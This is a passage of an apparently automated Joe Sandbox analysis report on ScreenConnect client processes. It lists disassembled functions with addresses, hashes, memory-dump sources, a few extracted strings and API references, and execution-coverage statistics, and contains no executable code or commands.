Opcode Fuzzy Hash: a4fdc89529014357c8c44665bcb10280a64f49addbc01c1eb7d6c792a85c1796
Instruction Fuzzy Hash: AFF0B271E00219DF8B40DFADD841A9EFBF4EF49200B60816AD918E7211E331AA128F80

Function 019FAA58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9102985eb7d521b6066b20138495f800b0a6e4537979f0295ca533ff53e20216
Instruction ID: 127518fa91f272cf54ac51dd219649e9d678ce1b43f30ee17547fd693ec4e73d
Opcode Fuzzy Hash: 9102985eb7d521b6066b20138495f800b0a6e4537979f0295ca533ff53e20216
Instruction Fuzzy Hash: F6E086327003515B9B142AAF789856EBBDFFBCD662B94403DE60EC3341CE769C0987A4

Function 019FAFD5 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c539cb96f8ef177f8cbd5b79dd4142cdd433d58db1f31cab5be2a76672353074
Instruction ID: fa1c6be8fa0da9cbf45aedd8e49920f756aacbe7ef44fa5c57377a5dee973e5f
Opcode Fuzzy Hash: c539cb96f8ef177f8cbd5b79dd4142cdd433d58db1f31cab5be2a76672353074
Instruction Fuzzy Hash: 27F01C7091D381AFC341DF38D965495BFF0AF46205B0684AED8C9C7652E734A85ACBA2

Function 019F0E30 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2c64ad3cbfc045fe05cdf86b872527135e5d64cc6fc68ada8574fd8943834f
Instruction ID: 91fb83ce7d5f6516ffda285cf8e6e3949352e771f95bdcbd5cbceab89afa09b6
Opcode Fuzzy Hash: 4b2c64ad3cbfc045fe05cdf86b872527135e5d64cc6fc68ada8574fd8943834f
Instruction Fuzzy Hash: FCE048323002009787157B79AC0549F7BDAFBC5255754956ED30ACB705DE63AC058FE5

Function 019FF950 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ccf07a0377215e41e963596f8c9da6d6947f048e353f2667b5792058e037fd
Instruction ID: c33b0054fc74b091b16fcfe12d15c083f70a780dab679be8b6394f3aa3b9e9b8
Opcode Fuzzy Hash: e5ccf07a0377215e41e963596f8c9da6d6947f048e353f2667b5792058e037fd
Instruction Fuzzy Hash: DFE086327032066BC714A62AE850957B7AEFBC9664B11447DD20DC7359CD769C42C790

Function 019F5979 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a19fe970c4c202ae42152f6053376ed845ece3eec7e37fb361c67bd3872b5a3
Instruction ID: e1d721f11097560dec3832d999eb1e261ecd03a42d7ddee003fe3d36b441e6d3
Opcode Fuzzy Hash: 9a19fe970c4c202ae42152f6053376ed845ece3eec7e37fb361c67bd3872b5a3
Instruction Fuzzy Hash: F3E02231909289AFCB05EB749C1054DBFB9DA4722674282DEE508E3282DA321E04C791

Function 019F3257 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3e08ed1b7366ff4de813390dd9be9ad10123a984cd559a0a138a7fa2e05659
Instruction ID: d9fa31153b15ecc3fee19a20b60a55f15aa67e8dda53909ab812ce7ed97eaca5
Opcode Fuzzy Hash: bd3e08ed1b7366ff4de813390dd9be9ad10123a984cd559a0a138a7fa2e05659
Instruction Fuzzy Hash: 41E092212092865FCB26E778F841ADE3FB1AAD2310B0849DED0409B557CAA4990983D1

Function 064C15A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60cd56c3da543cbcac3b0f56fa181245758c1d1470db3aef67b8ac10b6fe457c
Instruction ID: 308f016f366d0d4f8e3f301e2df20e36aafc7ce0b8266aa7b7f9be0749399c2d
Opcode Fuzzy Hash: 60cd56c3da543cbcac3b0f56fa181245758c1d1470db3aef67b8ac10b6fe457c
Instruction Fuzzy Hash: FCE086313002049F87149A2AFC8185FBFA9EBC5664354842DF60D9B700DE61BC01C7F4

Function 019F5930 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5362afb484df0b761aad92d10c9cf1b4603e8c5b6decd1c2c16b388cdf5cbada
Instruction ID: 0fec9b65bacd266d7a267da0d35d987f09b66f1fe1999cb09f286b531a30e524
Opcode Fuzzy Hash: 5362afb484df0b761aad92d10c9cf1b4603e8c5b6decd1c2c16b388cdf5cbada
Instruction Fuzzy Hash: DAE08CB63012189B870C667DE4188AE7B9AEBD9233310C12AF50AD3394CE34DC03C7A4

Function 064C0399 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc51453fe801aeba63e38f462fa6a47bd8c11a8ee4c46c79f67071286b6e5538
Instruction ID: f0c1ce3bdf5f0dd1f3f611fceac82e107daf1c1f333912d89b745b9f30b8b60f
Opcode Fuzzy Hash: cc51453fe801aeba63e38f462fa6a47bd8c11a8ee4c46c79f67071286b6e5538
Instruction Fuzzy Hash: F4E04F363008009FC7049B09D444E85BBB5EF88721B0A8076E61987321CA3099218B95

Function 019F5400 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2424c172fa1bc8b68a6929b528e496ff0cbcf94b69cf6cf673f1a4c3544de4
Instruction ID: 9460c08e1c0cdf6fc685de9602cc0ac1ae02d6ad7b6da133ec519e65400d6957
Opcode Fuzzy Hash: bb2424c172fa1bc8b68a6929b528e496ff0cbcf94b69cf6cf673f1a4c3544de4
Instruction Fuzzy Hash: B6E08670605311DFE721DB28D9105117F78BF1590234782DBE68CCB673C321C841D791

Function 064C03A8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9175ff0f1e39365fae3bc93b18724ad4fbb94b343a793a766b9853a1f29db88c
Instruction ID: 6abd31664f922cf96b4343af92287cdab8247abdf6f38207867b7673cec0bf08
Opcode Fuzzy Hash: 9175ff0f1e39365fae3bc93b18724ad4fbb94b343a793a766b9853a1f29db88c
Instruction Fuzzy Hash: 5FD05E3A3005149F83049B4EE408C8ABFEAEFC9721305806BF609C7320CB71EC01CB95

Function 019FED28 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac8ad32d56cb46b5235204084ccbb857f1fb43b2269fdf2500f2df7027351b8
Instruction ID: 1a2ff5b9a398d67fbb59fd15d02905c8eeeb3db9489c52e27441f7c6da331b81
Opcode Fuzzy Hash: 8ac8ad32d56cb46b5235204084ccbb857f1fb43b2269fdf2500f2df7027351b8
Instruction Fuzzy Hash: 04E08672404B488FC701BB78D859469FBB4FED5200B05868AD4495B152EB30E595D781

Function 019FBC83 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec1bb8a43b9e896db59377645194e1ef58146b2be1c2c54b1fbb96fd4b34e20
Instruction ID: 6c540412a12a3fb0eae941a3ad9a34c17be2970248e830061ffb098a5548c3bd
Opcode Fuzzy Hash: 9ec1bb8a43b9e896db59377645194e1ef58146b2be1c2c54b1fbb96fd4b34e20
Instruction Fuzzy Hash: 91E0EC718192918FC780EB34F99A185BFF0FB05615B4544AED8C8C7612E634A9578B52

Function 019F5410 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41049686b42ada652ee5b6107d9be505da2129aed9faf7c4acfb7c5c274435e9
Instruction ID: cea3d647295abadd38593f80714312163d13c06ce3bb936da757d9b982dedd99
Opcode Fuzzy Hash: 41049686b42ada652ee5b6107d9be505da2129aed9faf7c4acfb7c5c274435e9
Instruction Fuzzy Hash: A7D09E30700208AFB628DB69D54491137ED7B48A5636244AAD7898B677DA21EC41C75A

Function 019F5988 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b321c4ca7579f62a32e65c7aa413719dcb97060a864a2e78f1a85b6efbf59fc
Instruction ID: 3196b3edc6d532a0b75293dec2f78ce6e4fd93a9c67d0f7999d522804862e717
Opcode Fuzzy Hash: 3b321c4ca7579f62a32e65c7aa413719dcb97060a864a2e78f1a85b6efbf59fc
Instruction Fuzzy Hash: 89D01235901149EF8B04EFB4E90165DB7F9EB45205B1085ADD908E3300DA316E049B91

Function 064C0360 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a723ae7fb7dd7be9f7db7379bed752211fb1d3a4d6762f479c06d5bb27932a76
Instruction ID: cde8dc78b0c1ee922782a4cdd99416001fcf107fa46d6332a16e078b872c6d3b
Opcode Fuzzy Hash: a723ae7fb7dd7be9f7db7379bed752211fb1d3a4d6762f479c06d5bb27932a76
Instruction Fuzzy Hash: 30E02B3A300004DFD7089F18F800D667F72EF58312B014076E6088B373DA31C821D795

Function 064C0340 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d061dd9d10e9a1ab49500caf92399575fd4e86ea89c22c5e58d32a57c1ea70
Instruction ID: 65fbb6953808d86ecc03802985d8ad6a01dd9a90b7e51a8e9d8c788469472ba2
Opcode Fuzzy Hash: e2d061dd9d10e9a1ab49500caf92399575fd4e86ea89c22c5e58d32a57c1ea70
Instruction Fuzzy Hash: 10D012353106245F8745AB5DE404C9E7BEDDF5E66031040AAF605CB331DEB1AC1097D4

Function 064C0370 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6be545671f794b1f8cd6d8ae73fb97c27646c9a4cbf24ed8308598f159b8d87c
Instruction ID: eb069d1ee2514eadd6697188edb582e55e52b312585f860fa4618c6529fb6d56
Opcode Fuzzy Hash: 6be545671f794b1f8cd6d8ae73fb97c27646c9a4cbf24ed8308598f159b8d87c
Instruction Fuzzy Hash: 9BD0C936300528AF9708AA5DE814CA6BBEDDF996613118066EA09CB331DA61EC1097E5

Function 019F1320 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9b933369f8d4c760021fd52a34669ef425c92fe43b24498d22c475d9d28061
Instruction ID: b14317f0107ea6a966d33200491a25feb9e008e1b3157a32e2078430c403215c
Opcode Fuzzy Hash: 7f9b933369f8d4c760021fd52a34669ef425c92fe43b24498d22c475d9d28061
Instruction Fuzzy Hash: 23D0C96524A2D05FC303C76099619E5BFB19F8B624B1985DEE8848F2A3C667EA07C740

Function 019FDF09 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f9adb183b4eb8144fb986ca1654c24cedf4b93d12f8f532865165c4146bef7
Instruction ID: 6c6a07770f1686b7f19ef476ad4f4c361b5d6b3c551f1c869a8e3b2e3a24fbce
Opcode Fuzzy Hash: a1f9adb183b4eb8144fb986ca1654c24cedf4b93d12f8f532865165c4146bef7
Instruction Fuzzy Hash: 5AE017759192805FEB328B689C18BA53FE4E702302F96908AD54487086E3A5A410CB22

Function 019FED38 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e60957698cb6e1faf3b2b4b5cbe3e44e3314d2ba4326ade560b2b7ad922bd41
Instruction ID: cfdf9b643fa1f0a5d9095f8502fdf43784a98b76dd0fe2af2fcab891e0637d72
Opcode Fuzzy Hash: 1e60957698cb6e1faf3b2b4b5cbe3e44e3314d2ba4326ade560b2b7ad922bd41
Instruction Fuzzy Hash: 4ED0C73141470D89C700BB78D854469B7B8EED5240F40D65AE44957111FF70E5D0D681

Function 064C295B Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19821edd52c15ba6e7e0b90cf24d2af891e7945206792a12f453f1e7311a646
Instruction ID: 9195838ae2babea418065687467bf186e66b9cb8f9443b7b5e0a205e7dd6562b
Opcode Fuzzy Hash: e19821edd52c15ba6e7e0b90cf24d2af891e7945206792a12f453f1e7311a646
Instruction Fuzzy Hash:

Analysis Process: ScreenConnect.WindowsClient.exePID: 6752, Parent PID: 5728COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.8%
Total number of Nodes:	19
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34965761 Relevance: 5.0, Strings: 3, Instructions: 1229COMMON

Download Yara Rule

Strings

X]g4, xrefs: 00007FFD34966BA3
]g4, xrefs: 00007FFD34966A82
PMe4, xrefs: 00007FFD34965D11

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: PMe4$X]g4$]g4
API String ID: 0-3213853989
Opcode ID: 3dc46ccb4afc758b3f44fd3942a7862f42945e2d5890f907b5ac3947df117479
Instruction ID: d8c83e53b7d2bd05bcf92fe0c035b46f20f13332e6fef2bed3454de44d339e8c
Opcode Fuzzy Hash: 3dc46ccb4afc758b3f44fd3942a7862f42945e2d5890f907b5ac3947df117479
Instruction Fuzzy Hash: B2820331B0CA164FEBA99A2894B52B937D1EF96334F5401BED54EC72DADD2CBC029350

Function 00007FFD34965974 Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

PMe4, xrefs: 00007FFD34965D11

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: PMe4
API String ID: 0-2872419706
Opcode ID: 8447a9177d3f39a098d9abcdaabc9797737bde1d7d380870938322b939705403
Instruction ID: dbf9f022a10006d0fff44c8317fbc386ba264fc94ef732891427232edc392776
Opcode Fuzzy Hash: 8447a9177d3f39a098d9abcdaabc9797737bde1d7d380870938322b939705403
Instruction Fuzzy Hash: AF02F531B0DA174BEBA99A2884F46B922D1EF96330F54017DD54DC72DADE2CBC02A361

Function 00007FFD34653642 Relevance: 1.7, APIs: 1, Instructions: 171pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE ref: 00007FFD346756F3

Memory Dump Source

Source File: 0000000C.00000002.3402558862.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34650000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: ee43ea3213d686aeebe4c8d23b046f5dba776f7732c79bf074a26cec8bcb35d4
Instruction ID: 364b4e985a25d0cd1adc1b2cd9b5051d84013357d446214709930c52e3c9963d
Opcode Fuzzy Hash: ee43ea3213d686aeebe4c8d23b046f5dba776f7732c79bf074a26cec8bcb35d4
Instruction Fuzzy Hash: 19519E71918A1C8FDB68EF5C9845BE9BBE0FB59710F1042AEE04DE3251DB70A8468BC1

Function 00007FFD34965E1B Relevance: .9, Instructions: 948COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0970612b8d260b5983b3fd71e03cc13f82003ce0ead57c95a9644c608a8fad9
Instruction ID: 903bae39a4424ebca7fcf26bfbb09c4d6d033b7fe297d7a044d0cb2da28def38
Opcode Fuzzy Hash: f0970612b8d260b5983b3fd71e03cc13f82003ce0ead57c95a9644c608a8fad9
Instruction Fuzzy Hash: 4762F531B0CA464FEB98EB2884A57B977D1EF96320F10407ED54EC32AADE2CBC459751

Function 00007FFD349622F1 Relevance: 3.9, Strings: 3, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XU4, xrefs: 00007FFD349623B8
PU4, xrefs: 00007FFD3496231A
`U4, xrefs: 00007FFD3496234E

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: PU4$XU4$`U4
API String ID: 0-2517606696
Opcode ID: ed9dd223a8db03eda64514a4fa42f9d43c9f2cedb55ae8e382f3c6bfdb430ed9
Instruction ID: 0c9bbd3576fe5d2d0bbbe02176e04aff21023bb2b51f4d07962e23f014da829b
Opcode Fuzzy Hash: ed9dd223a8db03eda64514a4fa42f9d43c9f2cedb55ae8e382f3c6bfdb430ed9
Instruction Fuzzy Hash: 0351927270DA454FDB98EF28C4A4AA537D1FFA9324F1400ADD48EDB296DA2DF842C740

Function 00007FFD34964EB9 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U4, xrefs: 00007FFD34964F64
U4, xrefs: 00007FFD34964FEB

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U4$U4
API String ID: 0-2542483532
Opcode ID: a1304d42605d8203274184ddd2e28340c8257d9a6656696f2d056d70aa1f6830
Instruction ID: 186e56686a9ba8c9495291f6d5a63e8b141c7786e43c16e0e87cfeb73f5ce450
Opcode Fuzzy Hash: a1304d42605d8203274184ddd2e28340c8257d9a6656696f2d056d70aa1f6830
Instruction Fuzzy Hash: 0F418271708A898FDBC8DF28C8A4A6537E1FF59324B14059DE46EC72D6CB39E852CB01

Function 00007FFD34658014 Relevance: 1.7, APIs: 1, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD34658142

Memory Dump Source

Source File: 0000000C.00000002.3402558862.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34650000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 14020e571a2b7e5f8fb8ff07d9007cb1e5ce7af5fe47050319c7692fc577150e
Instruction ID: f8c2cc084c0f53d6a09d90786206dfe725f5ad2f1d288714c90d12a02b4f7675
Opcode Fuzzy Hash: 14020e571a2b7e5f8fb8ff07d9007cb1e5ce7af5fe47050319c7692fc577150e
Instruction Fuzzy Hash: 6D515D31D0CB594FDB25AFA8D8595E97BE0EF56310F04017FE089C3192DF78A8568B91

Function 00007FFD34653A08 Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3402558862.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34650000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018efa5a616777ba37bb499b669bce7f09655ed24a1f65368c1d67f519497623
Instruction ID: c2a0ce594cf0abf4746622fe29c12c101ddcffd318aee483830f18fe75b48cea
Opcode Fuzzy Hash: 018efa5a616777ba37bb499b669bce7f09655ed24a1f65368c1d67f519497623
Instruction Fuzzy Hash: E1412772D0E7944FEB149F98989A1F97FE0EF66B10F1401BFD089D3147EA28B8498791

Function 00007FFD349648A5 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

P'f4, xrefs: 00007FFD34964938

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: P'f4
API String ID: 0-3310925903
Opcode ID: 940ae1522d2a194a16d3302bed78f23d74fed8f9a3446e47d9aee77a210dc76a
Instruction ID: 3c98a8b2a674298ec3113a381819962e4abc93deb92ebca800361f2600103f3c
Opcode Fuzzy Hash: 940ae1522d2a194a16d3302bed78f23d74fed8f9a3446e47d9aee77a210dc76a
Instruction Fuzzy Hash: 5F914D36B0CA465FEBA5DA68C8A15B437D1EF96330704017ED54EC718AED1CB846C794

Function 00007FFD34962158 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

hU4, xrefs: 00007FFD3496216F

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID: hU4
API String ID: 0-829869575
Opcode ID: 721cd05605ca0a01251deb0d7457230f8f414669e7e3d7961e65f34ccc021d31
Instruction ID: 944359ede8eea93fde5e1c4ea9c49b67b06ec6dab3b2f33e901986582061bda1
Opcode Fuzzy Hash: 721cd05605ca0a01251deb0d7457230f8f414669e7e3d7961e65f34ccc021d31
Instruction Fuzzy Hash: 3A21F471B0EA864FDB95EB2884A4DB47BD1EF5532470900FDC18DCF286CD2CA842CB50

Function 00007FFD349638B0 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 600c9572fad4a11a955110a5cf97db9c54010473a561446322f75072cd66d2b4
Instruction ID: d5686ddeb2efb3cfb9db32743d4a5b1e906d97ec82f236f53c0d3b1c2e3437ff
Opcode Fuzzy Hash: 600c9572fad4a11a955110a5cf97db9c54010473a561446322f75072cd66d2b4
Instruction Fuzzy Hash: C1716B7271EB0A4BEB68D95C689917533C0EB9A775B4001BED68EC325AED2DF8434381

Function 00007FFD349639F2 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff606435308c18525e07471c2d0c0c436def39f46b0cf1611057c6a2b1b9ede
Instruction ID: 4eb923e3fa3c901824bbf6e637a08904840d602395b1e53e5d48abbb5bab994f
Opcode Fuzzy Hash: eff606435308c18525e07471c2d0c0c436def39f46b0cf1611057c6a2b1b9ede
Instruction Fuzzy Hash: 9C71403470CA468FDB98EF28D0A16A177E1FF9932472405BDC059CB28BCA29E843DB50

Function 00007FFD34963605 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407620617.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd34960000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238dd416fb04cc52b4b9c4583b44d88c33f13d3baccdd2602fc5caa6d96a8612
Instruction ID: 11a9b94a0fa21a47bc602a3533fdf8d17a9a6312d9d33edccaa5cd1ba7e64ac8
